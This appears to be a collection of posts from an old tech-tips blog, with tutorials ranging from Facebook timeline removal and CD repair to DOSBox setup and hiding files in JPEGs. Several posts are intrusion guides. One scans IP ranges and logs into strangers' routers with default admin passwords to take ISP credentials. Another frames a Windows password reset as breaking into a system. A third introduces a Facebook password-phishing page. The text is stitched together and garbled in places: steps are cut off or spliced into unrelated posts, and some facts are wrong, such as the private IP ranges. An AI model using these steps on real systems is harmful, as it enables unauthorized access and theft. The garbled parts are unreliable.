Removing Facebook Timeline

A lot of People has been asking me to help them to remove timeline. I was surprised with the amount of visits which i got for my post ‘Remove Facebook Timeline (Beta)’ . The method mentioned in that was only meant for removing the developers version of timeline . So If you go through the comments you could see many who dislike the new timeline and want to remove that.

I was in search of a method to solve this issue and at last I found this .The method will help you to get back your old profile without deleting any app as I said in my previous post.

The method is a temporary adjustment with you browser , like the Change The New Facebook Chat Sidebar Back To The Original trick which is working fine even now.

So below I have listed the methods for disabling the timeline feature for each browsers;

For FireFox Users

Open Firefox and click on the Orange Firefox button and choose add-ons.
Now the add-on window will be opened. Now Look for the search bar on Top Right and Search “User agent Switcher” and when search completes and the results come click on the install button and Restart Firefox.
After restarting the add-on button should be there in the navigation bar , If its not there right click on the navigation bar and click customize , drag the add-on to navigation bar.
Now click on the User Agent Switcher button and slide through Internet Explorer and Choose Internet Explorer 7.
Now Goto Facebook and you will see your old Profile.

For Chrome Users

Before Opening the Chrome browser Right click on the chrome icon and choose Properties.
Now Look for the Target box and add the following code after ‘chrome.exe’. (leave space adter chrome.exe)

Windows 7 / vista users should add the first code and XP users should add the later.

A Google Wallet Hack that can Fleece Your Account in Minutes

It was only yesterday that researchers at a security firm found a rather complicated way to crack Google Wallet PINs. The hack found yesterday involved using an attack on a ‘rooted’ phone. The majority of smartphones are not ‘rooted’. Typically only developers and techies are willing to root the device, which gives the user full control of the device with “root” privileges, but also removes certain protections.

However, now Google Wallet users may be wise to start getting a little nervous. There’s a new hack in town that’s much easier to use. This hack doesn’t require extra software, root access, or for that matter, any particular skills in general. The hack was blogged by The SmartPhone Champ, a major go to source for smartphone comparisons, reviews, and commentary.

In this case, the hack seems to be as easy as clearing the data for the Google Wallet app in the smartphone’s application settings menu. The app can then be reset which will prompt the person to enter a new pin number the next time it launches. The Google Wallet information is linked to the device and not to the actual account. According to The SmartPhone Champ, the hacker can then use the Google prepaid card already tied to the device to gain full access to the owner’s funds.

As it turns out, this new hack can be performed by anyone within a matter of minutes. The Android blogging site Androidandme.com decided to test drive the hack. They found that it worked on the latest version of Google Wallet on a Galaxy Nexus phone. The company posted a YouTube video on their site demonstrating the vulnerability of Google Wallet.

In response to the hack, a Google spokesman sent CNET the following statement:

“We strongly encourage anyone who loses or wants to sell their phone to call Google Wallet support toll-free at 855-492-5538 to disable the prepaid card. We are currently working on an automated fix as well that will be available soon. We also advise all Wallet users to set up a screen lock as an additional layer of protection for their phone.”

Here’s the deal, people who lose their phones or have them stolen can be especially vulnerable to a quick hack like this. For those that use Google Wallet, it might behoove you to invest in a security app such as Lookout. Since Lookout is an app, it’s completely downloadable. Besides security, Lookout also offers free antivirus protection; free find my phone, data backup, and other cool applications.

Repairing Scratched CD's

1. Spread a cloth on a flat surface and place the CD on it.
2. Then, hold the disc with one hand, use the other to wipe the polish into the affected area with a soft cloth.
3. Wait for it to dry and buff using short, brisk strokes along the scratch, not across it.
4. A cloth sold to wipe spectacles or camera lenses will work super m8's.
5. When you can no longersee the scratch, wash the disc with water and let it dry before playing. Intersting isnt it? Try it right now

I have used toothpaste with good effects before Ive also used car paint cutting compound on deeper scratches. It does leave lots of smaller scratches (as it is a cutting compound after all) but it will remove the worst scratches in most cases.

Hacking samsung Phones | Removing .jar download limit

So friends here am I with a totally new post, this is my first post regarding mobile phones so please honor me by giving your precious comments.
In most of the cell phones especially the samsung ones there's is a limit to the size of .jar or.jad file you can download and that's pretty much irritating when installing various apps, but that can be easily removed also.

To do that while in the main screen Type *#52828378# (this code is for samsung handsets)
This will unlock a secret menu where you will see an option like OTA test , select that and just increase the jar size. and that's it you are done.
I don't know what other options are meant for so I would suggest you not to play with them.

As the title suggests the post is about hacking facebook accounts, but the technique can be employed to any sort of account, email id's ,etc.

Since I tried it with face book so I would continue with that. Live demo (Script mails password to id you enter in email field)

what you need is just basic knowledge of html. To begin with lets see what we are actually doing, we will try to steal the password from user by making him enter it in a wrong place it just another kinda phishing.

Repairing stuck power button on CPU

A few days back I had a huge trouble keeping in touch with my friends since my cpu's power button got stuck inside due to my foolishness and i was totally cut off from the cyber world. Now I managed to boot it without the power button so I thought of posting it up here how I did it.

To begin with we first need to know what power button does and how it works.
The actual switching of the power (on and off) is done by circuits on the motherboard. The circuits are triggered to change state by a momentary short circuit of two points in the circuit. That is done by the front panel push button. A short-term connection of that button is enough. The motherboard circuit also has a second and third function it can do. The BIOS usually is set so that, if the circuit is already on the ON state and the momentary contact is kept closed for at least 4 seconds, one of two actions will be carried out. Either the system will shut down right away (like turning off a switch), or the motherboard will enter the "sleep" state and wait to be re-awakened. Which of these two options is done is something you set in the BIOS Setup screens.

So now we know that we just need to make a momentary connection to boot up the pc. The main trick goes here. There are many ways to accomplish this, But i would here discuss the easiest one and the one which i tried.

The easy way is to interchange the connection between reset button and the power button of cpu. To do this you just need to open the cabinet cover and search for the wire coming out from the power button (Front push Button on cpu) and the reset button and just pull the out from their sockets on motherboard and just interchange them, So now ur reset button will function as your power button and you will be able to boot up your pc.

So this was how I got it to work but if You did'it some other way then please post it up here.
One more way which i thought of was to replace the push button with door bell button but I did'nt try it out so I won't suggest it.
The cords of power and reset button are easy to find but take extra care while rmovinbg them freom their sockets

Turbo C++ Full screen Version For windows vista and 7

Hey guys this is after a long time that i am back to this blog. Being engrossed in studies I could not blog frequently anyways I am back with a new trick to run Turbo C++ in full screen mode in Windows 7.

For those who are really interested to know how it works here the steps go.....

In this tutorial we will be using Turbo C++ IDE, you can follow the same procedure to run all other dos games & programs.

Follow These Steps to Use DOSBox

1) Create a directory and name it "DOSFOLDER" preferably in the root/c: or any other. This folder will be mounted as C: in DOSBox, you will learn later in this post.

2) Copy all DOS applications & games (eg dev) to this directory. For example if you want to run Turbo C++ IDE, copy TC folder or extract from TC installer to this directory.

3) Download & Install the DOSBox for Windows 7/Vista & MacOS from the link provided at the end of the post. Linux users can use package manager to download DOSbox from the repository.

4) Run DOSBox, go to start> all programs/programs> DOSBox0.74(or similar)> DOSBox
or from the desktop. The DOS Emulator will open. On the title bar you can see the clock speed.

5) You are prompt to Z:\>
You need to mount the folder you had created in step 1, if you skipped it, do it now. Here you will store all dos programs & games.

6) I am considering the path to folder/directory "DOSFOLDER" you recently created is C:\DOSFOLDER (for simplicity root directory was used)

write the following lines of codes in dos emulator:

Z:\> mount c c:\DOSFOLDER

you would get a message Drive C is mounted as local directory C:\DOSFOLDER. You can use any drive letter instead of C eg H, I, J etc. Which is actually the virtual drive you have created in DOS emulator DOSBox. now type:

C:
C:\>

If you remember or used DOS previously it's simple dos command. For example if you have saved all the files & folders of Turbo C++ IDE ie folder "TC" inside folder "DOSFOLDER" then type

C:\> CD TC/BIN
C:\TC\BIN>TC

The TC.exe file is located in Bin directory of TC. In the same way you can locate the other dos programs and games. If you don't remember the names then us dir command to list the files inside any directory. The above line will open Turbo C++ IDE.

I think you are familiar with this code except Mount command.

Configure DOSBox to Auto Mount & Auto Execute

1) If you want to save some time from typing these codes every time you start DOSBox.
Go to "C:\Program Files\DOSBox-0.74" where DOSBox is installed using windows explorer.

2) Now run a batch file "DOSBox 0.74 Options.bat" which is present in the folder. A "dosbox-0.74.conf" file will open in notepad. Scroll to bottom, you will find [autoexec].

Just below [autoexec] write the following lines of commands

mount c c:\DOSFOLDER
C:

And save the file. The above code will be automatically executed when you start DosBox. It will mount the folder DOSFOLDER and create a virtual drive. Now you can type the name of programs to run.

3) If you want to use only one program eg Turbo C/C++ IDE or DEV ..
Then after [autoexec] write the following lines of commands

mount C C:\DOSFOLDER
C:
CD TC/BIN
TC

Above code will directly open Turbo C/C++ when you run dosbox.

Windows 7 ~ Password Cracked apart

Well actually what the title says is not fully correct but correct to some extent.Today I discovered a new way to hack windows 7 administrator account and that's what you need to break into a system.
So ideally speaking you are not going to crack a windows password instead you are just going to reset it to blank or just change it.
And in no case you would be able to see the windows password (although there are software that let you steal windows passwords but that's bit too cumber some and time consuming) other than that if you understand that encrypted version of password what i prefer to call French then you can see my post on" Breaking the SAM Apart:"

Anyhow let's get to the point so what you need is ~
Trinity rescue kit 3.4(or better)
or
NT password & regedit tool

I prefer to use trinity rescue kit because it is user friendly as well as it contains many other good utilities which can revive a dead system But if you have low internet speed or just don't want to spend much time downloading then just go for the second one it's far more powerful that the first one but the best of it's features are not at all user Friendly.

I would like to explain using the second one because it's quite straight forward.

Step 1: Putting the tool on a CD / USB

To make a bootable USB drive / key:

1. Copy all files from this CD onto the USB drive.
   It cannot be in a subdirectory on the drive.
   You do not need delete files already on the drive.
2. Install the bootloader (you may have to be administrator)
   On the USB drive, there should now be a file "syslinux.exe".
   Run this from a command line, like this:

j:\syslinux.exe -ma j:

replace j with some other letter if your USB drive is on another
drive letter than j:
On some drives, you may have to omit the -ma option if you
get an error.
If it says nothing, it probably did install the bootloader.

Please note that you may have to adjust settings in your computers BIOS
setup to boot from USB.
Also, some BIOS (often older machines) simply won't boot from USB anyway.
Unfortunately, there are extremely many different versions of BIOS,
and a lot of them are rather buggy when it comes to booting off different
media, so I am unable to help you.

For CD: You can directly birn the iso onto CD and use it. (I Prefer USB and would suggest you to use same)

Step 2: Resetting windows password

The following is a walkthrough of using the CD to reset one user (admin) on a test Vista computer.
Insert the CD and convince your BIOS that it should boot from it. How to boot from a CD varies from computer make to computer make, so I cannot help you much. Some BIOS shows a boot device select menu if you press ESC, F8, F11 or F12 or something like that during the self test. (some even tell you on the screen what to press)
If it boots, you should see this:

This demo shows selection 1 for password edit, but you can also do other things.Note that 2, Syskey may be dangerous! AND NOT NEEDED TO RESET PASSWORDS! and does not work at all on Vista, but you get some info before you do any changes.
Selection 3, RecoveryConsole is only relevant for Win2k, XP and 2003 and you must have selected to load the SOFTWARE part of the registry (selection 2) earlier.
The manual registry editor is always available, it is not the most user-friendly thing, but anyway..

This is a list of all local users on the machine. You may see more users here than in the overly user-friendly control panel, for example XP has some help and support built in users.The users marked "ADMIN" are members of the administrators group, which means they have admin rights, if you can login to one of them you can get control of the machine.
The buildt in (at install time in all windows versions) administrator is always RID 01f4. This example is from Vista, and Vista by default has this locked down (the installer instead asks and makes another user the regular use administrator, in this case RID 03e8)
The "lock?" collumn show if the user account is disabled or locked out (due to many logon attempts for example) or BLANK if the password seems to be blank.

Some status info, user is locked out if "Disabled" is set or "Failed login count" is larger than "max tries" policy setting. This user is not locked in any way. The lockout can be reset with option 4 below.

IT IS STILL EXPERIMENTAL AND IT MAY sometimes RESULT IN STRANGE ERRORS WHEN LATER EDITING THE GROUP FROM WINDOWS! Also, usually pointless in promoting the Guest user, as it is most likely forbidden to log in by the security policy settings.

Creating Locked Folder in windows 7

Recently I looked around on the internet on "How to create a secured folder for windows 7", but that only lead to programs and software, That you'll have to end up downloading and installing, and after 30 days are so, you'll have to end up buying the software\program for future use. So i spent some time recoding the "Windows XP Folder Lock Hack" and came out with "Windows 7 Folder Lock Hack With Backup".

How would you like to change the logon screen background in Windows 7 so as to give your Windows a customized look and feel? With a small tweak it is possible to customize the Windows 7 logon screen and set your own picture/wallpaper as the background. Changing logon screen background in Windows 7 is as simple as changing your desktop wallpaper. Well here is a step by step instruction to customize the logon screen background.

1. The image you need to set as the background should be a .jpg file and it’s size should not exceed 245KB.

2. The image resolution can be anything of your choice. However I prefer 1440 x 900 or1024 x 768. You can use any of the photo editing software such as Photoshop to compress and set the resolution for your image. Once you’re done, save this image asbackgroundDefault.jpg.

3. You will need to copy this image to

C:\Windows\system32\oobe\info\backgrounds

You will need to create that path if it does not already exist on your computer.

4. Now open the Registry Editor (Start -> Run -> Type regedit) and navigate to the following key

How to create a locked folder in Win XP

To create a locked folder we need to create two batch files. The first batchfile will “lock” the folder (actually it will turn the ordinary folder into a link to the Control Panel using an address code), and the other one will “unlock” it. When someone tries to access that folder, he will be redirect to Control Panel(we can in fact type in any address code so that the user could be redirected to wherever we want). You should hide these batch files, especially the second one.

1. Create a folder, that you will use to store your protected data. For this example, I created a folder called “locked”, and put that folder in My Documents.

2. Open Notepad and copy this code ren “FOLDERNAME” “FOLDERNAME“.{21EC2020-3AEA-1069-A2DD-08002B30309D}
“FOLDERNAME” change in to name of your folder, in this example “FOLDERNAME” is locked.My code looks like this ren locked.{21EC2020-3AEA-1069-A2DD-08002B30309D} locked
Save notepad file like lock.bat in My Documents. In option Save as Type, select All Files

After this we can see in My Documents something like this:

If we open (double click) lock.bat our folder will turn into a link to Control Panel, and the files will not be visible. until we use unlock.bat

What are Private and Public IP Addresses

Internet Protocol (IP) addresses are usually of two types:Public and Private. If you have ever wondered to know what is the difference between a public and a private IP address, then you are at the right place. In this post I will try to explain the difference between a public and a private IP addres in layman’s terms so that it becomes simple and easy to understand.

What are Public IP Addresses?

A public IP address is assigned to every computer that connects to the Internet where each IP is unique. Hence there cannot exist two computers with the same public IP address all over the Internet. This addressing scheme makes it possible for the computers to “find each other” online and exchange information. User has no control over the IP address (public) that is assigned to the computer. The public IP address is assigned to the computer by the Internet Service Provider as soon as the computer is connected to the Internet gateway.

A public IP address can be either static or dynamic. A static public IP address does not change and is used primarily for hosting webpages or services on the Internet. On the other hand a dynamic public IP address is chosen from a pool of available addresses and changes each time one connects to the Internet. Most Internet users will only have a dynamic IP assigned to their computer which goes off when the computer is disconnected from the Internet. Thus when it is re-connected it gets a new IP.

What are Private IP Addresses?

An IP address is considered private if the IP number falls within one of the IP address ranges reserved for private networks such as a Local Area Network (LAN). The Internet Assigned Numbers Authority (IANA) has reserved the following three blocks of the IP address space for private networks (local networks):

172.16.0.0 – 172.31.255.255 (Total Addresses: 1,048,576)
192.168.0.0 – 192.168.255.255 (Total Addresses: 65,536)

Private IP addresses are used for numbering the computers in a private network including home, school and business LANs in airports and hotels which makes it possible for the computers in the network to communicate with each other. Say for example, if a network X consists of 10 computers each of them can be given an IP starting from 192.168.1.1 to192.168.1.10. Unlike the public IP, the administrator of the private network is free to assign an IP address of his own choice (provided the IP number falls in the private IP address range as mentioned above).

Devices with private IP addresses cannot connect directly to the Internet. Likewise, computers outside the local network cannot connect directly to a device with a private IP. It is possible to interconnect two private networks with the help of a router or a similar device that supports Network Address Translation.

If the private network is connected to the Internet (through an Internet connection via ISP) then each computer will have a private IP as well as a public IP. Private IP is used for communication within the network where as the public IP is used for communication over the Internet. Most Internet users with a DSL/ADSL connection will have both a private as well as a public IP.

You can know your private IP by typing ipconfig command in the command prompt. The number that you see against “IPV4 Address:” is your private IP which in most cases will be 192.168.1.1 or 192.168.1.2. Unlike the public IP, private IP addresses are always static in nature.

Unlike what most people assume, a private IP is neither the one which is impossible to trace (just like the private telephone number) nor the one reserved for stealth Internet usage. In reality there is no public IP address that is impossible to trace since the protocol itself is designed for transparency.

How to Wrire-Protect Ur USB??/

Many a time, it becomes necessary for us to write protect our USB flash drive so as to protect it from viruses and other malware programs. Because flash drives are so popular and most widely used to move data between computers, they are the prime target for attackers as a means to get infections spread around the computer world. Also, since USB drive is not a Read-Only Memory (ROM), the data inside it can easily be modified or deleted by malware programs.

But unfortunately, most of the new flash drives do not come with a write-protect feature as the manufacturers wish to cut down the cost of production. Hence, the only way to write-protect your USB flash drives is to enable this feature on your own computer.

This can be done by adding a small entry to the Windows registry which acts as a switch that can be enabled to make use of the write protection or disabled to allow write access. Just follow these steps:

1. Open the Registry Editor (Open the “Run” dialog box, type regedit and hit “Enter”).

2. Navigate to the following Registry key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\

3. Create a New Key named as StorageDevicePolicies. To do this right-click onControl, and click on New->Key and name it as StorageDevicePolicies.

4. Now right-click on StorageDevicePolicies and create a New->DWORD (32-bit) Valueand name it as WriteProtect.

5. Double-click on WriteProtect and set the Value data to 1.

Now the right-protection for USB drives is enabled on your computer (no restart required) and thus it would not be possible for anyone or any program to add/delete the contents from your USB flash drive. Any attempt to copy or download the files onto the USB drive will result in the following error message being displayed.

To revert and remove the write-protection, all you need to do is just change the Value data for WriteProtect (Step-5) from 1 back to 0. Now write access to all the USB devices is re-enabled.

Sometimes it may seem difficult to remember and follow the above mentioned steps each time you want to enable/disable the write protection. Hence as an alternative way, there are many tools available to automatically enable/disable the write-protection feature. One of my favorite tool is USB Write Protect by Naresh Manadhar. Using this tool you can limit write access to your USB drives with just a click of a button.

CAPTCHA or Captcha (pronounced as cap-ch-uh) which stands for “Completely Automated Public Turing test to tell Computers and Humans Apart” is a type of challenge-response test to ensure that the response is only generated by humans and not by a computer. In simple words, CAPTCHA is the word verification test that you will come across the end of a sign-up form while signing up for Gmail or Yahoo account. Designing a CAPTCHA System

CAPTCHAs are designed on the fact that computers lack the ability that human beings have when it comes to processing visual data. It is more easily possible for humans to look at an image and pick out the patterns than a computer. This is because computers lack the real intelligence that humans have by default. CAPTCHAs are implemented by presenting users with an image which contains distorted or randomly stretched characters which only humans should be able to identify. Sometimes characters are striked out or presented with a noisy background to make it even more harder for computers to figure out the patterns.

Most, but not all, CAPTCHAs rely on a visual test. Some Websites implement a totally different CAPTCHA system to tell humans and computers apart. For example, a user is presented with 4 images in which 3 contains picture of animals and one contain a flower. The user is asked to select only those images which contain animals in them. The challenge in breaking the CAPTCHA lies in real hard task of teaching a computer how to process information in a way similar to how humans think. 3. Open another notepad file and copy this code ren “FOLDERNAME“.{21EC2020-3AEA-1069-A2DD-08002B30309D} “FOLDERNAME” , Save as in Step 2, just choose a different filename , like unlock.bat

After this we can see in My Documents something like this:

If we open (double click) lock.bat our folder will turn into a link to Control Panel, and the files will not be visible. until we use unlock.bat

Usually when virus hide files and it also remove folder options it is much difficult to get the files quickly if one is in hurry, although such virus can be removed manually (Read Remove EXE virus manually) ;

But I’m going to tell the the way in which you can UN-hide all the hidden files by on single command.

To apply this command follow the following steps

go to Start > Run > type cmd

Dos will open type cd.. (two to three time until only drive letter left)

now type the drive letter in which you want to Unhide the files lets suppose in my case itsF:

this will open the F: drive

Now type the following command attrib -r -a -s -h *.*

Press enter this command will un-hide all the hidden files in Drive F even its portable memory stick or usual hard disk.

The sheer amount of information on the web overwhelming - we have text, images, video and animations. Though this information is freely available for viewing and downloading, most of it is under copyright. The creators specify the ownership details in the copyright statement, typically found at the bottom of the web page, because no one likes their original work to be used by others for profit. However, it is impossible to prevent people from copying and using the text from your web site... yes, there are laws and one can always sue but the fact remains... someone can always use textual information from your web site. Images and video, however, offer a neat way of protecting ownership by watermarks.

What is an image watermark?

I'm sure you would have come across images that have watermarks. So what is that? Animage watermark is a semi-transparent (and sometimes, a fully opaque) bit of text or design element that's put on an image to prevent illegal use of the graphic. Watermarks can be added using image editors... in fact, there are many free services available on the net that let you upload your image and add a watermark.

Once a watermark has been added to standard web image file formats such as JPGs, Gifs or PNGs, it becomes a part of the image. Depending on its placement and complexity of the image, one can try to remove the watermark or at least clean the image a bit.

Note: I do not encourage removing the watermark from images. These have been put for a reason - to protect the copyright and endorse ownership. Please do not misuse the information on this page to blatantly disobey the law. So why have I written this article? The instructions provided below for deleting a watermark from an image are for academic purposes only - to tell you that it can be done.

How to remove a watermark from an image

There are three popular web image formats - Gif, JPG and PNG. If you want to clean a watermark off such images, you have to employ an image editor such as Adobe Photoshop,PaintShop Pro, the free pixlr.com editor etc. Actually any graphic tool that has a "clone" utility can be used to remove a watermark. Having said that, the success of cleaning an image depends on its complexity, the placement of the watermark and its size.

Below is an image with a watermark - my name. We shall now employ Photoshop's Clone Stamp Tool to delete the watermark. Click on the icon or hit "S" on the keyboard. How does the clone stamp tool work? It lets you pick a spot on the image (a source) and clone or copy it on to another area. Thus, we need to replace the section of the image that has the watermark with similar content (pixels) so the first step is to pick a source point. Holding down the "Alt" key, click a point on the image that you feel can be copied over the watermark area without significant changes to that area - this is how we select the clone source. Feel free to use your judgement. I also advise on using a brush size that complements the image. For larger images, using a large brush size and vice-versa. Below are the settings I used for this image.

Some pointers for removing watermarks

Zooming: you might like to zoom in to the watermark section to correctly clean it up.
You also would have to specify the starting spots many times for better results especially when the watermark is large or has been placed over an area that changes in color or complexity. Make sure the source looks similar to the watermark area.
In the example, above, the presence of the watermark on the tree trunk made it very easy for us to clean the image. Thus, the placement and size of the watermark as well as the complexity of the image determine how well it will be cleaned.
Don't waste your time in removing watermarks from smaller images as you won't have sufficiently large area to clone.

How to hide files in JPEG pictures

If you’re looking to hide files on your PC hard drive, you may have read about ways to encrypt folders or change the attributes on a file so that they cannot be accessed by prying eyes. However, a lot of times hiding files or folders in that way requires that you install some sort of software on your computer, which could then be spotted by someone else.

I’ve actually written quite a few articles on how you can hide files and folders inWindows XP and Vista before, but here I’m going to show you a new way to hide files that is very counter-intuitive and therefore pretty safe! Using a simple trick inWindows, you can actually hide a file inside of the JPG picture file!

You can actually hide any type of file inside of an image file, including txt, exe, mp3, avi, or whatever else. Not only that, you can actually store many files inside of single JPG file, not just one! This can come in very handy if you need to hide files and don’t want to bother with encryption and all that other technical stuff.

Hide File in Picture

In order to accomplish this task, you will need to have either WinZip or WinRAR installed on your computer. You can download either of these two off the Internet and use them without having to pay anything. Here are the steps for creating your hidden stash:

Create a folder on your hard drive, i.e. C:\Test and put in all of the files that you want to hide into that folder. Also, place the image that you will be using to hide the files in.

Now select all of the files that you want to hide, right-click on them, and choose the option to add them to a compressed ZIP or RAR file. Only select the files you want to hide, not the picture. Name it whatever you want, i,e. “Hidden.rar”.

Now you should have a folder that looks something like this with files, a JPG image, and a compressed archive:

Now here’s the fun part! Click on Start, and then click on Run. Type in “CMD” without the quotes and press Enter. You should now see the command prompt window open. Type in “CD \” to get to the root directory. Then type CD and the directory name that you created, i.e. “CD Test“.

Now type in the following line: “copy /b DSC06578.JPG + Hidden.rar DSC06578.jpg” and press Enter. Do not use the quotes. You should get a response like below:

Just make sure that you check the file extension on the compressed file, whether it is .ZIP or .RAR as you have to type out the entire file name with extension in the command. I have heard that some people say that they have had problems doing this with a .ZIP extension, so if that doesn’t work, make sure to compress to a .RAR file.

And that’s it! The picture file will have been updated with the compressed archive inside! You can actually check the file size of the picture and see that it has increased by the same amount as the size of the archive.

You can access your hidden file in two ways. Firstly, simply change the extension to .RAR and open the file using WinRAR. Secondly, you can just right-click on the JPG image and choose Open With and then scroll down to WinRAR. Either way, you’ll see your hidden files show up that you can then extract out.

That’s it! That is all it takes to hide files inside JPG picture files! It’s a great way simply because not many people know it’s possible and no one even thinks about a picture as having to the ability to “hide” files. Enjoy!

How to hack into someone's router using his ip address

Almost half of the Internet users across the globe use ADSL routers/modems to connect to the Internet however, most of them are unaware of the fact that it has a serious vulnerability which can easily be exploited even by a noob hacker just like you. In this post I will show you how to exploit a common vulnerability that lies in most ADSL routers so as to gain complete access to the router settings and ISP login details.

Every router comes with a username and password using which it is possible to gain access to the router settings and configure the device. The vulnerability actually lies in theDefault username and password that comes with the factory settings. Usually the routers come preconfigured from the Internet Service provider and hence the users do not bother to change the password later. This makes it possible for the attackers to gain unauthorized access and modify the router settings using a common set of default usernames and passwords. Here is how you can do it.

Before you proceed, you need the following tool in the process

Angry IP Scanner

Here is a detailed information on how to exploit the vulnerability of an ADSL router.

Step-1: Go to www.whatismyipaddress.com. Once the page is loaded you will find your IP address. Note it down.

Step-2: Open Angry IP Scanner, here you will see an option called IP Range: where you need to enter the range of IP address to scan for.

Suppose your IP is 117.192.195.101, you can set the range something as117.192.194.0 to 117.192.200.255 so that there exists atleast 200-300 IP addresses in the range.

Step-3: Go to Tools->Preferences and select the Ports tab. Under Port selectionenter 80 (we need to scan for port 80). Now switch to the Display tab, select the option “Hosts with open ports only” and click on OK.

I have used Angry IP Scanner v3.0 beta-4. If you are using a different version, you need to Go to Options instead of Tools

Step-4: Now click on Start. After a few minutes, the IP scanner will show a list of IPs with Port 80 open as shown in the below image.

Step-5: Now copy any of the IP from the list, paste it in your browser’s address bar and hit enter. A window will popup asking for username and password. Since most users do not change the passwords, it should most likely work with the default username and password. For most routers the default username-password pair will be admin-admin or admin-password. A detailed username password list can be found on internet.

Just enter the username-password as specified above and hit enter. If you are lucky you should gain access to the router settings page where you can modify any of the router settings. The settings page can vary from router to router. A sample router settings page is shown below.

If you do not succeed to gain access, select another IP from the list and repeat the step-5. Atleast 1 out of 5 IPs will have a default password and hence you will surely be able to gain access.

What can an Attacker do by Gaining Access to the Router Settings?

By gaining access to the router settings, it is possible for an attacker to modify any of the router settings which results in the malfunction of the router. As a result the target user’s computer will be disconnected from the Internet. In the worst case the attacker can copy the ISP login details from the router to steal the Internet connection or play any kind of prank with the router settings. So the victim has to reconfigure the router in order to bring it back to action.

The Verdict:

If you are using an ADSL router to connect to the Internet, it is highly recommended that you immediately change your password to prevent any such attacks in the future. Who knows, you may be the next victim of such an attack.

Since the configuration varies from router to router, you need to contact your ISP for details on how to change the password for your model.

If you've ever taken the case off of a computer, you've seen the one piece of equipment that ties everything together - the motherboard.

All of you, the beginners, should know that motherboard allows all the parts of your computer to receive power and communicate with one another. Basically, the motherboard serves to connect all of the parts of a computer together. Its main job is to hold the CPU (Central Processing Unit) and have every other computer part connect to it. It is the 'glue' that really holds all portions of your computer together.

Motherboards have come a long way in the last twenty years. The first motherboards held very few actual components. The first IBM-PC motherboard had only a processor and card slots. Users plugged components like floppy drive controllers and memory into the slots. Today, motherboards typically boast a wide variety of built-in features, and they directly affect a computer's capabilities and potential for upgrades.

We must say for beginners that a motherboard can come in many configurations to fit different needs and budgets. At its most basic, it comes with several interfaces for necessary components and a BIOS chip set to control setup of the motherboard. Many computer enthusiasts favor one type of BIOS over another and will choose a motherboard partially based on the BIOS manufacturer.

Types of Motherboards

In order to understand how the motherboard works, it is helpful to know which type of board you have. While there are different designs for different purposes, there are two standard types of boards:

Integrated

The integrated style of motherboard includes many components on the board itself. This style, with its “onboard” features does not require add-ons such as sound cards, video cards, and the like. This type of board is less expensive and easier to manage initially, and is often chosen by those that do not have a lot of computer experience or a lot of money to spend.

All boards have some integrated components, such as onboard sound (which can be turned off in order to add a sound card), but the lure of fully integrated boards is that they have everything wrapped up in one neat little package. Keep in mind that onboard components are “stock” parts. They do not offer the same level of performance as specialized expansion cards. Also, when most onboard components stop functioning, you cannot simply repair, remove, or turn off that component. you may have to replace the entire motherboard, so an integrated board may end up costing you more money in the long run.

Non-Integrated

With a non-integrated board you can troubleshoot individual components and more easily repair or replace them. you also have the added benefit of customizing your board by choosing high performance expansion cards that best suit your needs.

For example “gamers" - people who are into computer games - are usually most interested in high performance video cards that enhance high resolution graphics. Video cards have built in their own memory. They also have built in processors called the GPU or “graphics processing unit”. These features not only free up memory, but also free up your processor so it can do what it was meant to do. With onboard video, the processor takes on the duties of the video system which then has to compete with everything else, ultimately slowing down all processes.

How it really Works

The beginners should take note that the function of the motherboard lies within the name of the part itself: it's a board (specifically, a circuit board) and it's the mother of everything in your computer - all connections have to go through it. Videohardware is plugged into it. The DVD drive is plugged into it. Is your scanner plugged into your USB hub? That hub is plugged too into the motherboard.

Let’s say that a motherboard is the electronic highways for the electronic currents to obtain from a module to another module. It is a very composite task to go signals in the right array, and in the right method, to the right receiver. Also, to absolute the job of linking all these mechanisms jointly, the motherboard includes two particular processors that work on the scheme of message of data to and from all the procedure in the computer.

Once you understand what the motherboard is, you begin to understand the difference between things like integrated and dedicated graphics. you understand how everything in your computer is connected.

It is also very important for beginners to remember that there are two chips on the motherboard that control everything that is sent on the bus: the Northbridge and Southbridge. The CPU is the Central Processing Unit, or simply, the processor. Since the processor is considered the “brain” of the computer, the motherboard can be compared to the “nervous system.” Nearly every component relies on the motherboard and is connected to it in some way. It is essentially a circuit board with paths or “traces” that transmit power and relay commands to the other components to tell them what action is needed. The motherboard links everything together, and helps the different components communicate.

For instance, when you click an icon to open a program, an impulse is sent to the motherboard. The motherboard then signals the hard drive to load the information into RAM, which stands for Random Access Memory. RAM is basically temporary memory. It is like a temporary storage space for your operating system, current information, and programs, so the CPU has easy access to them. It is temporary because once you shut down your system, this information is deleted. The motherboard then sends a command to the video card so it can calculate what needs to be drawn (text, colors, images, etc), and the video card sends that information to the back to the motherboard, which sends it to the monitor. All of these things take place so quickly that the information goes from a click of the mouse to an image on your monitor in mere nanoseconds.

The Most Important Components of a Modern Motherboard

CPU - A processor rarely needs replacing, and CPU upgrades are seldom cost-effective. But because new CPUs run hotter than their predecessors, you'll find more heat-sink fins within the PC's case. It's crucial to periodically blow out the dust that impedes their efficiency. If you want to beef up your PC with a faster CPU, you may need to upgrade the CPU cooling fan as well. An extra hard drive, a high-end graphics card, or an overclocked CPU can also cause your system to overheat.

RAM - Adding memory to your PC is often the simplest and least expensive way to give it more oomph. But RAM types are always changing. DDR3 is the latest and fastest flavor. In fact, the trickiest part of a RAM upgrade is finding the right type and capacity of RAM modules for your PC.

PCI Express slots - Many high-end PCs now have PCI Express (PCIe) expansion slots in addition to standard PCI slots, which have been around for years. PCIe slots provide up to 30 times the throughput of the PCI bus and will eventually replace both PCI and AGP slots. Fortunately, your old PCI sound, network, and other expansion cards won't be orphans for a while; today's transitional motherboards have both PCI and PCIe slots. you may not be able to use your current AGP graphics card in your next PC, however. Most new PCIe motherboards sold use a PCIe x16 slot, rather than an AGP slot, for graphics cards. PCIe slots come in different lengths, corresponding to the amount of data they can move.

SATA bus - Serial ATA (SATA) replaces the slower parallel ATA (also called PATA or EIDE) that manufacturers long used to link hard drives and optical drives to the motherboard. SATA ports first appeared on motherboards more than two years ago; many SATA motherboards have PATA connectors as well. SATA connectors are smaller than their PATA counterparts and support only one drive at a time. So you don't have to fuss with jumpers to set a drive to master or slave as you might with PATA. SATA drives require a special power connector in place of the standard 5V connector used for IDE drives. Many new PCs come with a SATA power connector, but older machines typically don't. However You can purchase an inexpensive adapter for converting a 5V connector to SATA at your local electronics store.
